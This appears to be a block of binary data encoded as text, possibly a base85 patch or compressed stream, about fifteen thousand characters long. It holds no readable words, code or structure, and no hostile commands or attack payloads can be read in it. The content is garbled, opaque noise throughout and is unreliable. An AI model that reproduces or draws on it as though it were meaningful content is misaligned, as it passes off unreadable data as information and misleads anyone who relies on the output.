z)G8+=L9KEe5CD6G8YYk;@AF*T6^Q830rg4PQ{BdYDIxlnhI1@%g>9^w?QzDHva*;Z zNnJaMAhH56tBQ>vdlE#ar9Q6fBe^iJ^$U*4Jo!j>20OqW`hp_^~Tw))+ z134DYg_Wu_?F9cly1f%VO`6wEaD6m5mwDu0f&iJbdjob5;-G{A(~$uOaf-fc2#Mg~ z=S%?ps0bBc(HTGsi6o;AV9^Txqs)_R!@=U6WD?pN5un-vbb0_s0|eQ((oRK6*yST4 zCRQhK4S5m7q0aY#t3T@$y349|~ zyLohNmyp&%=;Z=Y2qAvXKR!P;_E~d%C)YP(gYA-s_cvuuh(-m-4e)!AlOj|8u^n_6 zcmST;K>(*YmuS8nA3a-w+yF;s6EniIz?UKXvl9ora0_IR3%CID3K4jLhbLq(J$?cRJWtn7@bk*(2j~kZ zLeIm{Jss(^Zbd&GWN-#~!UjjLUg;eORo(No00`<}^I{}DfRYAj5Q>EI2VF3Vfdc5Y z?gWcx_JPs`V-WUG@1K4E2wgsc?Cy}^cyT`@9MklJlJDy&-H$gYg+Fy87buRm zx*gy6j{o=`|M6HG@?FV<6&y0y5{KQ}U#y`uHpZvN!@{iC(ZuAfu zG5?mCA~-7bM#ryS3y?<@jwee$pf4N@SYb2lS+r?+hB08l(g3w_<<6yB*X~`sdG$6l z+1Kx1z<#Y(tQy#`;k}9PmUytDB^$*^OH?>O;6MgQku{$^V1WY%KAT04cF86~ng1J` zNUvtCm<*ZLv1QMuUE8+W!?|_uK3SNdZ{EQR-X>n$_;KXPl`m)B-1&3p(WOskDct(? zgoA%m#crMYcktoGk0)Q={CV{0)vsUL-92{g+TZJDU*G~StZr|hjd!hHHsu0{QH^ifD7g%Z#}=gW}L0k>=vKpj`wl&3?}`czU4ij}y zRYu_xHB|o$Y6;ddN41kjRCCpJS6=I5mBC-*y6)9ZW3?3}T3Nwnto}6?a^6%hjt}WA{4DT86%js8}b0m3LXb=!KV}Z;M69p?UEQ zcOrOCqBq`w1O63Va}!p0VTLV2n7@bBThv{C_pMh|eY4HTVt)TPv_oBcG>5y!xk9qiN&V0Y_xeCT5Yp28ZKnGzy2}qvBf^wYP|E- zyHBm{>pMNJSxp=1yID^9)4DO9du@>Yb-ZK3k9L@G$qjED^2#q?T<5(z_x$ro|JAlZ zilv4%@o+a6{Or_O7d`VNS66)S$q!~d^3!Q&*>ICV_x*R^XZ)MJ;m-@)V_Z?Mz1t0i ze%I;8E$97mfJ>L#b)L~(Ie6~7_kP6UC4L=ZgtMdm>GM@)zIpR`&pmm>b&q}g^S%Cy zTdBX-e}Dedg)sc`aPDbsn;z^Ux4iZV4Sp??-2xA{t>dvRZU5Qn9mo22K@4VaYxMKq zf&}Qk`YCUDZu=n6sz)~UrSM`GQQGw$IKB#6P=hn1VGW-HK%8+fKP80R+S)}c`5moy z^Mhg38mKbqozQ_H4C3>SD6;g~P>NHeqHJ(zJRN3jeX?U>&aRg}5jGBGs#75pF;}>P zQO<{j(_H+{#>OhfQI2!W%N5OI$M9G$j7(FY*|JwOS=p~5V|1YTT4=P)>4=YfG$Z=x z_((`ba!~)v;(a0rwVw^phfYIeAGedqQ7uxBM02702uVr_;!%>TWF-|{tts;-AR!xr1PEgq-Q1U*MX9r{p+{*$2(je-(%ffX%iVV_apXh-Mq(Rp+<3LqtE zNl7YFl%{l~CS~bIRr=DEw$!9BRjEu_O4F3ubf!2JsZLAE)1LYiq(JqkP+dyYmDg4r-E&1VjIiYn^Lu+x*$v( zmS6;O4Ack$U1(=L`&rO-cC$-}101fRg=8cl2Jwi8VqN=M*v3}2v!!iqZF^hX=2o}6 z(XMs7U{Ca>SG|zzf@+hn&m}Yz9TEj^eeL_*B`CovN{B-eh_GG&2Ux%w zB!X&{5QWT|gTD7=aDx?Ugn3})yaT3ig)Qv638N#y3wCgaJB-;2hgifTu3|$6%3%+u zn874waf@C2JrgTf#WQa3i*0;k99zxAD5i0bL!19&AO~5<=ds)qEX0wdI%wq*Rl*|J) zGnxINU3|Qfi zR=3(Ae2BpiVmxO%KUCMtW_GjZ^4&8JAqfwW0tF}_g@-5s)SN{&nw9NraEDvmNdfOU zD1eNH$hx30(619x5r;<`G{)nmcfIX>kwpI!!PQQPfei|3gBUa<6-00}mgjwMgeQF5 zqW*&OGEc$iI0@tM;c(l{r2(W_kF8laol{w65E8-k1){8{K!*=HQu zZFH<>eVz3^ce-P+?sg+X-PHLIuI_|tUpw3WW;Du~QgtPObM1TQ zyXSaqg9*Dk*be!^5a{l4K{Ms-lvQWn9shXlCAy*Hn6^ZYK>>-^9pg&Dd%Yn4dC+4} z^5-DO5GHbrsPDMoSXRp7Js*15$3Fjf^_@I9E)oZ(FWT-t>AW)af{cMHAqh#Chdj(| zW_iqG_)5?>x@G@-=s$_}q_@3Ah%jr3B0kGValP;JLIesdVF{n!Y(Y2sY4KCwztLxZ z`+=l=&|>5Zn1%oLdD8n{rVM+3afTC~QQ+(gz>$L}&58md7_X106a{n-PZEv>TtEnn zKna{c3amg2yg&@hKn>hL4(vb={6G+NKqsibD8q;(@Tb*-vYzO^{6nPu6AUM?tbo!z zvYROGB0VD@tp^N29_&FM{6QcLLLnSNA}m59JVGQ)LM2qdh9JQ~!w9kSGg0%nDNMnI zf(iWFn7K%WRye^$i>U9SyjK6%H}@+;Gwcv2yh4mP24s*2pIb00ghMM-D41YDEtCr) z_<{2K!dgox4jTd^_<{91LqaS>2C1=>NCgTYGlx>O8lMPBU1 z^gzUw00V%NF)_QeI3NPpXb2*RgG+r8TdvT zkOMh@2sW?+E64=m&;(m}f@yFF5nuvYNQzl7$GLC;A0UBoj0|902>^V=i<35C1GZF1 zf+29mN@R&kyu-7=y&M0GMbLVv7>I+&V1w64Mu(_Ki=2wr-~>+4jEa4FBiM0fPwrq&O1OT~YioaA& zyiAO}RL;IUi|DijO9;(AY0l>~%zA2p8GwNvcmY}XMkaX784!latW4s-OdiloC*Vxa zM2ZyvO}QA&(mc&lj0kdwf~#x^S&K1t6S(aXz|UI2Xsku67&tjpu{cyPeY1)RAWp8p z$B8I}&`;CU$Nq!}GW&sNfQf!1(13F{f}go$UkO@*wAR`>z> z>dl8lF;)LmupejztN75aK!Cz@2o2>+hwxD1G*P;=OX=iJyr@nNJyAJ@3L@nb7Io2j zB7nzC(>kzGv(QnS00dXKfD8D8i%3*O^@WHa13!q=Nreb97)g|90Y$xlJ%|V&bqFA> zPn3X!2T)X0h=>&!(j48?i$H}*aFBrpQ8oW5&RD9WRXIT(Si=n6~NNr|x2>l6bsg;S(JQ98W~ZcPhu zg_LhiQ$IZ?K-GbX_=8z!PaTkj^t4eO=m9HOgu=9i$5hP6WP&4gf>ppzhe(0PJcNfx z0mc8s2p90z$Glhhbb?Q9h)_id8GwO@eOMV-1c$g!9gqQgeM}e-Rfo9PjO~Fdm5txW_&5Cag(L9X`5@l1rEZcF_6E`Kyb$zFS z)d3mB2pwg~d+paAILe1$0UYSphvk78=-9_pjhcmk#{`3iAOL*5h$pDgkcG^^b%=>| zf{ML}5}?V9y;&I$T*%E>7=Qs3c!&$Y+?VZv0?^im0EGf@*n1sM!gT_g&4dDYOc(!X zM<*zS)m2QFh1^Q53NKALi8wKHFf;2KLzGZNKKv)7U9_xJLu3WkSo+FGtij*y&3`h> zr9gz_L6QI?H=zrpHG=?_2o6?&t_T1E(BO%%U;Ncyi$H`1_Tdn?fQJ7_*SB@2 zBj^E))d3fvfkjwZh?oT%rOC{2f))5&9*|il5P`=mfX%(#5Kv5Zbb>BWOcJnN%zVr~ zb^;k_Nji>*S)fS>$m3aP*Br>l$*tUp5Ct4i%me@nGOz{1b=QVS)gBm6OlXKzkmDoG z1RVI>uk~ZTU0jDyOdfawhsXd^ZU|e=gcs-moP7xW{K<&{PBm z5a_N|&IFiXIc4822mpv~XMC2349MsYcIOVLVJ9erg`Q}LV1R|T%n}f2eg=RWu;Hx$ zfCfMSwajP?e(8t+=a&8qSBQu%P=J=^3IT`+5AbM>HiL=S=ZJo1e})K!zE*<%127Kb zb`l1AZAl1tf}UPu#f;2{U;-GJW1f7>DNtjZ)#W42Wgf6yALv^hfB-?xOp7Q-E7;hF zcuYoE*+~vki@;1*b_jmm(NBiifOP^Z2y4y6%#nSFL|_5MJkEqxOdlxh!xn4UCCwtp zggx$o+I@%@2Zv+_T?k>*nwr=q? zaQg0w@1$yWT7jG-UBz^PfYnjveh3=nYs{PhU;b)DZU`o5$+Yf)wvJC*h5@*CiCm6x ziIr=L`Q~yfzbbeh*F(d7Jva7$mLyzh!iq25we_GBWFOq^R)Y zM#lw6&H;}I=N?;(U<0E*fFkCKnV#>6_TjGWfVouek4}ILxNw>NUbjrnt_TDrrfvxi zTa^A_OORmqwP_S6feg4-OAv*NSnzA*^lSBWhX4YPHiQgVbxhyxY9(igFo5OG#}Q!X z5J&)H*G_}3Upf7ZD28HO2Ze_)Qve8nVkh+mD1e99aIWY80k{BTXJ3b)bPG*@5-0<4 z$Kr+n^>!{{aX0mbxCDOYfCj(T6G!oNng$tQg5CdxWf+jxPMFI!fB+hAOf`1`O~`R4 zXo8m9Ts%-rQ6NoU)&UqOg_oQ4Mcmb3cO`2?R+x==ZpMeP=fj15dpq0AMny=Sv2sns4*=z{fbkc4ewX6R(Q1eY%8z>@hzMc>RFTiwicY-QdXl^%Ww3TN`uU`{jOAZJG{Vs%u zCeDTD^>IIgS%>?quvX~|fqWE$04L5!Zir{c^ad#B1t87_kYy(**K6m11`y(g*jh|S z0PardUB_;jo&dq;-;B0|xG!*6ALWM7Ubg@5cH$I)e4K+kwS;nRZ<&sJCrE>g26k(w zZg_48Hehy4p8$u5X|AYtNk9Vs4o%|+fCqQqYaPltNN<^r{D;tXOE76MFnsMq{H$1f zu4sHGxbIR|;NnMh=ag@OHz)CQ>xIwJolo3{2l5$p`1;&~2>=Kfs+_EV(Zfj@9WR{B z(xGFMlZX;0I*|p#Aq*HZW;kRdC!z}+JZMNHFk>Lai7#M0`IvIz3WsheYJ$K+R>YMV zcV?WC(W4Ur0$)<}!NQ?K7mHpJz=5Mj4~H*E60K@ArMawHw{q>Om8iLMV!e_*H^j&o ziK*76nmFXF*mGpbUak95my$S2?DGGWh>Sv9xnTnno@>}#5+#NMZ>7+-FHuQI0B~qP zLZSfx04xzmsVMX20TRU+u%KDA)k2^xb&%syOc>ArBFGVQNwa1IOC^>t9Xg_z4VqcI z1g^$60+&d9H^?+m3?a=85Jdbu9F%I!95{HQILCx^MilW}a5dnNRol1$=$_bnIBMGu zE?nq7+KY7R5-T8gIcLFe9Y}qirz{qY@#iRp>5!G~4P8s<*>7>Hs@R3kf z)MXS>IzW&EQ8F-Ls6!j6IOSnpjrG+_jA^xMSE~+@#99-rmBbLQrrK4POA@g}s;~~` zYF4YFbIuY;MD**fS}j2Ylb0|zqZ48PxS1u5I+5LPm>GB#1HM^uphPWz073?KRLkIY z8c-DBxDj#N04OPi%K>{Ig;Ahpv{A&yxi?%;oooUGAZ{Kh%|Qsh+ufk8UFuQBfx8pI zOD<7j9O0rw;Y!zrM3et*Cf_z2*(=pmTYWXwS!=yD*Ij%4HQ0S=B0~``jrqh< zW7<5CNhpOh15Ok*AyV9T>M+F&Jjf7{4luOi!wd^qwF*>EtJDM9fvzbON<^*1L)liX z0F|~f*c5l)kYANTRGYE@0Szud;LsF_zElbUP-%{8v#$!46)`?M%ddb1_;vuY6FmaZNr^;7s2RTiu(l1+3}3hjKmuIh3%;O_ z1Nd7Xd|vX03kU#R6;PRk^kbpbR16WBsmv52G6(!%>i`Lm-vRg&o&{;g5)b@d!#FU& zh_Imq4=6(hDj=6ra07^Vhe4E?7y$&Ju6G&WeGNci{0{c92C5G@k}%+q z`Zv5Sa%kHwVuuWz z0Dnf&9GL%fPyo{rMHoF$q?CeJEWr$c97G`pIcPVRRk=zoanY45%@M{V#2{G8GiI_T z620KXKv_$YqJ%Dhp&PDe0wn?;x%7vzlz4$TFU(knvc<#*I-z{)Ij43cln9BPMvI;i z(s~p`6#Ai4GXWUbRa_=ci?MGaY&bwYaWkC_fk#3Uh{z7=moE`UXFXUvX9GwE&YVGv zG``V5aXb)Eihd8C>oJ3UByzoUI`jk+F(*2=vz`VdVuT!}NNfz`&N9-prZ&APPIIc$ zoo-1K6L5$OrZJH=97P8eQ=6Fx6%>caLZ~2d2n3v(6Bb0pUx>tkLtq(5s4QYPZb;=J z6S@C5rM^UT3YmsWxg1DFCycI2#1>Fl;sc-pgEejPm2o>|IvxMy zz;vp(NDnR*kyAW)byXpp4kplqSzN%u4hgH82GuyCq`)Bs$N?lSAXtS+q^)n&q#HQb z0~OE06@u-7;1b(|ja*<8rI>)~A_v%rh++nXqoJXA@Pa=$0T!u4oKzbtOS!xyEfHbM zW1K*S7{H}ju&V4aF$+5|&cg_u)fMvMvVy zo&f})0u_h!00srvTZG-1k_nJi!vohrRMMD|9Bh~(1n5Xzy5N*f@qh=0l!#a*l7gXF zg$yo6N=6DWZo8!?JjIQwC)cx%;-OQp0cqz`aCCLj?q?GbikQIDIc-)3zxs z*ZRBnzW+V&gD?Ckx!?r^$A~JXktjAOe8OaP0w_p@l%S@h4Ok_tL`dL}PS`~T#z%?| zXy8gUMkEI@j>yPoToopCN+8NFmqS_(SBbR22kloy=~D9HPBDS8JC6tx?1V&Uf+G=K z5A>gv$XOgbh7uIhV8lT690LVp-SSM9EQQgr+!;EUgAH(&SL|7zWgR*w$p|pV(M$v) zG*tS88m#r#kX!{Kh)cRngar5oZMckb`Bt~Y#&8^$%pk%UU;_V$@QjbtTeVzEuE9&a zIM-&>9Ytu%!uW^=FxUbmRjJ^@ETd0sjBh5`_PbQoIH;D#n>5hid#v$fiKWY2Td zh$UEpy1)zfjYf-XMh;#D5pn>cI6)Xh#34XU&`gM1)!t_KAb$ZN89Yb~_Q!KHlz$B$ zBu1hnP9i1lTNiA?CV&AdJP8{(fgk7;AVdin@Wm*Ok(?31W5j?5iiHitKtvov4Orlv z$ztn-QJkrY@+1aXj9q9MPguy(2qp=3NypFB;dZzlqVZwewTv5D0t&cC0Fej|T4DHv zfyr2c08oSq0f6Z_ffs;A1Ej!7fkp>_*P%%o2#CwqVgtC9HF8fj_KRH941BuvJnOwJ@tc8#2kVk$_%*Ugd? zJjO4A9R+5cEn1ymB$E?}mRJ}i^!Qn^1XD16-ayXAOzBT@aGIpSolJpC00BS2KDm{>y`2jJzyW-M9h3k^Vq-_GM+ay?3uM4b%^_=5%MRhjDs9kuJdB!s+q#8U z>h+_fdC+>GfF0lgKsCq|0tX3IlNP~N(rG$5d^?Wu^JEJMgnX? zWv)l+0l}!@6CSjsxK4MJ z!lay?8DMaQSU5&R{3I;~<*r~LQDy~bIl(dw#&s@>FWzFRJY|uLp=OjJQEX!a$Wt=r zPgY*VHXacGj9SIuAX%~?xg-=ijoOU>N6>K3Rsw)E$%~|kK_Os~WpLVKo>Kq;mtfu@ zM8-#VO-z4wKx0-5BH-2luoCTohDz0wqGe`rMd)sX!GQu0>kVcNau10PharfNLcSq7 zo##Z@=ftGwLym^X@F(j5=W*^RkM^jK{wV*DZc%bNK`H>o2D*-OI>GBir*s}h7;)X5 zZRb%gfl^{85y*uR7{ReH=~kc}l7vBxG(dj7#6GGd>A{+M>S$GDK!2u_;Q`0IO^CMK zC2zDTWxQb(MZ|m5Q%6n&ojO6%jHg7HK#sPMB@j`|#3_TGlx4uNFh;d0CTM4 zODsomIgM=P3CsX@yG2qK0OY3ljBtDL69YUE=WSSD_S03VQnkIW`TlxYK)V^zSHeG$MnO%%Msfx4cP zM5croc)>%NfrgaEgczX{uq8TmfT9&bdx|Ej`cuC8$i0rnwP=SKl*z85>#+VT&<3s0 z4y`0QmN}qeM8rT0yiO~g*_A$PlMa&uE=Dfu0u@{>)?RJ&Jg4gflMPfWPT|2HjIEWV zK^JrZm+{3Pq`}%!Nf)F68Kl7{ZpkQ?VwJGL7sM@t^~E$w1R4BoUDR!noGlro?NzV= z+`=tim@V4!#qQWG(MGQ1PA>oDR&Gui?E*$b12!cDo>?4lDbyN<)ZSTEB+DZ_Le^gG zuW&8a${`7TSx>SsG@fUZ?lAv+3k{GOvIjL?do2|^gv7X*5vcH zFZ{-@{LU}^QjPA4#jMndUm(Ngf^SfU(O<**QjRU}LLLPqVl3K1~y1w&#X zkkScA-VEok4(~7zM=t;9wys=kDKEv!2$QhZg%K_hF_w@;miDj{KQRBf7 z63Z_+s}YB<7)61!*3J@hg`F8e6i~4lpD`Mzu^L;j6^C6GZ}GE^(fH1pmekI(tT7(v zu^#U+9|vt4r|=)c@m!3NF2unRXG!hE0ohSa)p4_SR-DD|aLLt1MCwujU+glJ z>@qKta_TP0FxM|I>vAOfvL-7tCl|AoI5Q|ib51d{fF1KGU$bzgGO?&~D+f;*C4nr{ zvN;$5*dhrqpY#7CQ?pg5GcmI>fJw8Fz;pYaGcsSYH4C#m6NNiRNj_J}KG)Pg>r_Bv zGeJ*cvUW2EJ4*I z%NA^bLFvss-hc+aCcG!$IX`6E=Z+2g>HrKfJ zY2)=`&-Q({|M!ANH-jH|d$Tu!(>8_UR21wa zZnrWS?=}_mHWd&-9B>H-n}Tt7HgcD=a)&Z?)3;SixP#|+fS-4Yi#LnMc#XF>e<%2j z+qnOI!!?b|cYhZ+jK6n|^Z0<5cPab0erK|hLp77*_jeP<5pZW|RwQw;H))pUIULOSIdcIQ_zsg0Fh%?T5lq4)RJxHwLL{Jg zqVst~v~{GbH!@E;zTQaHn6TC-W{W zea_o>)uX-I!#&=Ay3V(|y4$_OCv!mC``@oU;1|B%KRJYl{otd$+`qkZKfeF9OF7y1 zdBj)#)!>B}SNv^Xyqujw6ez(WgArV(!ZS3x3k%akBta{r!nadCZ>WF@5P&qWyw$(F z(;t4S-+bFAKF#NSd_OrQRDc@vfg!Bu&_B6k(}5#MKp&jI(i?sw-~QDufCL0WB2aym zV|Ltcckma$40iq32lLslxuxSi;qSiKv%UDMf9@kbsW-ReZ~xoRf8(dW`M3Z5%fFH9 zecb~D6)H{$5)^n)U_mDc6E0*pP~k&`6CFw{XwjlUh8H(#MCkD##f%gyb_Ch*VZ(?Y zSF%jW5u?eHAyYy;X_I75ojZB<^!XELP@zMK7BzYlX;P(2nKpI$6l(uesZ*&|?OF3- zvN3U%3_W+woH-*#mc;3j46Dqd8PpguG{GB7k!oi`j5+dW&4~=RY`H14(GCfM1gQx0 z7bX=tVpR00Q%!DSy9oPwkq{^mUXmjZJ_(`NU2faNTcgEgz=epjkw)bzGh;t4fUi@?2<-4Oxp5D4Tap^*pLqBcYrE0oX z$(J{O9({WC>)E$={~rGOvku0- zujKght0FE`%4rLP8fnCY!8E`QCxjMjtd6({JnkUBEW->n>Ms9$F0=_uvGAbMzSAp0 z*H#m6yqm7`Zo2Lq91_F_du)!jw185MCg9|9&bA|o^sz|k=GzHM9&z-MzyVuqkjm#= zWKFj47#tJG_|#mJ%{JY96V5p0oKw94`$EVRK8T=Ti6v~XA*Vn4q=1MuOrfl=46!om z2s6wOBm_0oSn$M!wwQ#J3pL_`MuSYN&PFO8@l48_C_(YFQK`s6Q;s;*aFPlnDBzli z6n*g^N*p24#8y!~Xo1Tz6O{^1uOjuuElA09RF3F~F_ILCwaLpLtF&&*Ysa)!TO+fp z4Lm1r^c6|uAWZF}YR6S6%PvdRZc6RctrScuxlHoPdl&!Jsmyd+RJUFsv5fLeIt@M; z;e-`lnBj)uwDZ~_)@owRDnD^d&{~h??g`cz9S401g+~tTR56S^Sz#vFgO35uj0y7M8 z6jDzLVqn$*RARubO1x2sEw`{gL7GS=*@BWrzDV%;M+4Erp$(hKz^(iZ`B20K^uL|} z6X}8j{OxQ6M|hX-P@jDp$dD zC$Qc1i*vi<$>Yv7u+XtfI7plw6TyT!(E)6A=7Jr`kmoNjhEa27tQ{DkI2kTV5st%? z;~eQ&M?2n8j>Svd8Lc$3Boc)Idnics+(!SA5=bh4k0MMP2*Lm)6rd8{3*Y#h5C#b# zGJb?PfHc+@7)d$GgE-WKKpNo)2}q!Tfe-;gJb;A!1;Q<&DF_@e2}`#GVgODMLjuj0 zKL$FmAz_f<-KufH3=*h@2=bsI2y=rS2Fp`? z*#vxs7(g`$!WP0@fFRyf12s8ipb7sHK#**Z)da6$K@SjSegp}YTiW0aF%;r@1sFhI z5J5mgJg=16FXqP>^nO8d`V)R(UtCWsS7-h#_qar{K-g9R9O+0#t9~fKsBAv;HqM4BgF2hoVlr;Yk;w!{pD5y??9KkIoa4I4k6#+S{j}C|+00HP1UbiFy zGE`^=2oiuYoyAH5a4{=d3nGTK3Zktef~#v9dyR&aVW*5B;b21W-AOd#026#eBM}rp zg3y5u9F!_S=o^R#L_&R}5bFfR*F#xyc8DSXGPQIhrQtScp}Nftj&yt5)_M_(zJ;7= zM~CGsH@TtD6=;2ed%M1xUn1*dViEaA60J)PRQQpaMgL zz=C*aY#WTHk_uc;06YH_2(n5Oy;>Dy0Z3pGL_9pf5WlrVHKD^%ofnsaG-C$>zyx0} zGftOzID7;#fm;Nrk@zx#Ach?lDLefDW^kd0P8iJ)1M%7D2sfTjw$k$6xi8yIsmen_ zXg{gUq=`=1%S^6!nD@DE+s=E<`b^@x_kHe=wtL{HA-Hov>co5Y8R8L__{1q5TQ=s~ zqe~(5b*9bC5R?HD6k#-a#TUUzrsx%~P#XsOFq)ijD%XcS!V$_)hM6aD0@o13TLU48 z1EAm!bhAmMnHh)-xMFAssda`asZ?D*P_4dp>oFhlEVee?3Cl7bFq0RC5kxy>Zn*&p zYHoA97N8CUIS~J)GSrBLJc3g_oS>uvL4qYGkDpvr_q)xU@Q*?nxoJ}E->sB)?P9#P z>t3#%#k?pl2l|MDUO3?iZ}D@9Y4XZ7e4PbfanFAq^r7eIpLyGGK__M7IXS?AI{2u+ zZqKD8cj|}RYP>CIp;#hLJCdMj1_bpXn+Os_X5f3tw&c&k1)(n{Aq9pJUaAq%qp3l1 zjhVFey1&MB%t`uUa=h7N}~HJzzG}+M96Q~1mgVCZ~e?*36qcx(~jjLz(g!$5+dSR^bd!?p#KDJ0!M2D z?@SP_CEzOX1M5km4$<-ikvldp@c@kwwX5(H5zZ1ZO#-g+6wmSuQ3D^aQXH=ln@DmH zPz6&_6<3iJ>m<8AF}nt_C!$9v*noOw#j(r_6cj=Xsvz2g$t`k8BeaenFz9P|BIY_F zA{PH*C)mKN+@cI=NLH?=te_{uCV~wQffs477)gXWdWe}AX(v`>(>e_O3?TObs{thAPvf(4|XaOhzmU|(X?{pxzyxc_^}mTWGMy$0GV+B`>`Yj(jk)5QX(gEAYajlVo?@(f)n*zgp1u>#nt8@Ep<7Jx8TNFjtO1F(u5dGQ=`(0@RP zCtS!SX($0Q0281`vvlkoDH1HhQY^=kEX&d?R}muzDlHdkyL?h7xF--2U?Muwu`d6C zzm^h}NK)-QL?Iqvr)EFt3Dh zGJEa7!0;15cGgLX=Gn@35{PUc$2@CV)KC8uPya!q( zs+SCb0F-n|7nL6M=W09?*nFZ^^CwojN!PTo!`L(rCIYW|i2yE>BJlr5e?s-X@>Ho} ziBO|eTBns-tJPZF(yTG6<_mJUn??OiF0576<`BaU z6=wPFW_Olnd)8-v);DuDW`UMyi`Hn57HK0+X!|K?o7QQc7HXsRca|1WrPgY%7HhLs zYoUT_A98EI7Hq>-Y`2zb$JT7m7H!iuYRgt_+tzL07H(S>W~KkjYo`_z5vFe6z`4u69r)r63aZ5IFqpNWN(jx?yaw`{Nv(+IhDsmYzZ+T~P z_4aewq;m`EanD1HGLj$l&2m?lbqm%|$>T^u7by9fSjTonFL~o*bg`9piK2O_VtG>+CWzO1ulHJ6@OY8;xHM;Su|p$P;x$eJ zjW~jOW9vA`7ayI>632zh=As3chjm(TArn$E@CknpFG|waw(b{x?U#PhcM^Ric15vz z!Y+VS_o^mII$2fwG>t)rK z&ED9E+*n-x%>fVUjQ;}Nj@W(G_e*{Qj_G%Wi6f64%75orHw1Z&lS_`j?2xxA+m+lC=^@xpp81Fy_ugIFN*)!I|LG@rMaNH7ll!T zsy}cyJg}0BIGs_N&cNEIJ6QmyI=FcHh{ylhotK)f>-zKJI)<^>ij0|)**ccX8dX5K zofi>*clmHBikc5Pi#0f`zq*?f8=a#$k*C_C1Dc!jS*$4=xA0|=OPVe18ni<@^z=Bd zYq~i2TAU-hn6bLAD|)a|7!eH^oGaOIQyR8CIiZ&ss>`>vTf4dRIhJkOu`wIBft#Go z8IE(AqeYv!n|r!QdyI8Eq_euSRXe)-xVW@zv6*P1FT3-qIIXEUyNmm#ftrygdAy&w zkXu^1@7avQo4D88xZQiZ_n56sF?gL@zxSJt*gKJfID@4+xEYX%KPtTg{J*igidfpV znb@?w`@R?4hljYW=d9p{d!euRZ`=Qx!8aVgk($3lT*Q0Fzk_;>5gdzydx!fDx^IKE zDSU~|`iWT?wHxli;oF(1*z{OD!2^$DM$7dYF(Il=Z zTZ~uwi!bNJh1<4kI}uNjT)bMDeHpoF>z(c!78enTl*okJJBQ^>x!e4=JzTNpddcUU z&aKNJcXzp8`6}*wGfa2S&$l55rf~V(&;J~H^McTaBG9>((YXc01G~;6UD8wW%So5M zscU)xSI#G$(>wj5VEQ2Q`q70a)7`cMJss6k9l8h{dWUxOHr>=qUDanDYcavrZyncj z9TUWc*L&U9#YWeI{nme-*m?h5*oD2=i~ZPxJ=uwU*>%0yfBo2<0NSIy*L9uRk=@#j z{n>GS+qu2lZT;JUJ>12;*PWo*%iY|+UEOzm+}nNJ0Ri6MUESk--r2q0>Al?TJ>T(t z-}OD*`TgJhJ>UVp+XcSh3I5;>{@D?J;T68&8GhLvKH?#M;wAprDgNRuKI1W7+d2N@ zxBcElzTZiH;7vZ^QU2jozT#Pa4=#9SUUEb%FKIC)$A1zU8U@<*k0{vA*ed{^_|s>b-vI!M^In{_4p- z>&<@aZ@%l*{_EL3?A`x(`lDa^r=R+(-}b<^TWx|5Y&aVi6#mIeA7T$vJc8&K*p+5TU|{3ynk} zqRWYsM^rLu+{m$`$B!UGip*%y$;gu^O`=>$lB3FxFI$3)$+D)+n>cgo+{v@2&!0ep z3LQ$csL`WHlPX=xw5ijlP@_tnO0_D{l3259-O9DA*RNp1iXFR^rA40><18U(#Nk4P z2;D+V$aYDbvsP`ETuKvY-<5dt3LZ?ju;Igq6DwZKxUu8MkRwZ;Jd>>D%a}83-psjc zs#ZzJ$%WW3uIbZp$t7u(s)+46e`Z}tFvMMV1QG}rLrGNRA8hL}*WiK>MkwKg6i)YGg%MuZm4+B<#$ksbhA3i( zYK>OliKiW?kX<8=^`UStwkYF_G}Z`Qj9hJD5mW4T$8J0-h7YUCpsU#+qb(LBIh5*tRAooM5;n zo1Kx-Wqfy@krfCBWUvQ_4;(gjvB z#3BD+TXT_FV5x4!p`>aJ_AR#LUmbg*j99~olz!cDa1?#W1>SnC0$^JIS z0+#1d|qXsUr?nv>lUNxuxB=>l?Yb7J#q505rgeZ2d6}KnG60to7Dhcb!=(M3i>m!YGa%7hLBM(Hdv@TI~OJ z)Kfd5GrMB#aBKq@hwSUD4Tw8ovB&zHna$1;?KNj&>|id>9DrdF;oCY{Y3&=0M2*7n;K121>8M~5W|A+jPc1+RNs(l>>-1CaY= z9v6p8{ zd=)aA}5FD+o6Pd2(KlE1&L%7%LO~3 z6+qU;e}0@!6C0ovJ8ou*xzeLW5Q)WqJuO#Vj1UC_$;nQ7l0KnI*xAOuyB34j13U~^h2g9lD<0*f4hTCxhkDZH`+HB|qL10nby%3R?D zJj_y7X1JkOkO%^FdQ*~Ev1c$jpnw|yv?PcCX0-xvf+~sy1iCDz6V6$!5ZJ*hC2(i8 z1fhYjb1PLafi4~QOZ|0|e4K&%Z&(7WVpVPty+KKKu!9W9 zPXHLuL=9&q23ZDE5L5Na16E+xYMtN#5730G(nn8$;!~fb%Ro&PAk<=h5nvCHfHl48 zP_BSLqX6K*0sc4EK1kIo3{b&4&7jk;a8Yt)Pyj7EV9>0H0TKVY45||nYE2G|4=X!R zK}|WU6){vnml3EH5Du_V5qO0S6);x^8k!Xi-YX2D%~b+w_sQlu_qo9#!V-!kHd2z! zlx16j5>$DtRu*k%mGIo+I1mUu8clGDaKH-}XNd%W#h86qFV8GNz^up-01pr#PYV$< znMIao^~DMYKxc_A7|XwwkZ4x$fU<9as{=?a3Ci5G-d_bmEQBk7CMxXG(Ji>a6cejf z)LY^Ix;HG`%LIsdreM+?c)XSXr>#EcU!HY9##r${i5X`^Y#r+a0w^)CFj12BRm>6& z1*9106}1j%#cn%>=MIB5-Uc|iBqb+E~)eP5R;$o>@iRZ^TGUMT{T(2RV`>QoKzJBr)gZ0TDDuiV1j z3tx~&t-yjyZ4Um?CJCL1zfs%8p0Elf_gx@=+)l~3z$aIaHrVv zbhDzlKta(0sTv18)G9`!(`H4|%rrWRsT{R!rV4)^ zmE`d`Jw5YGcE4_3YS3ObAL$zHG@1Y}EHVw>@w(dqe8vtdU$)R6(r9o70vwuq}xjpmI- z1fd`Mz98BldHq%(zbsbbXq;ATS7Ty=bBx*hUmG8(eI* zcNsT-m@72GC*xe`8GFI^&Gn1O2Tdn&W_@}r&za8{26<3mcFe77MbbvRPTxU~pNB(( zK+3#7^HUdlFF-(V#@xM;!;*L##Jo5BP4+Wfb=?mZ1tr{jqQ(H&Yi@j-sv9T<<%|P4 z$K-rs`dxE?2}n(lXXjIL z=2LWjkpcA@^m8@O2mlO1f^uc>)*=X6wOJWm*5m4@CLNMm*>GXIFr>^^W^+o*Kl zc^cRWEWE zO}UJ1@8Y5^pNGuW#9VZS1enAP#o{Zb6P>jxSIWs(+hN$;NTFS#i5@4@-pD~39biqQ 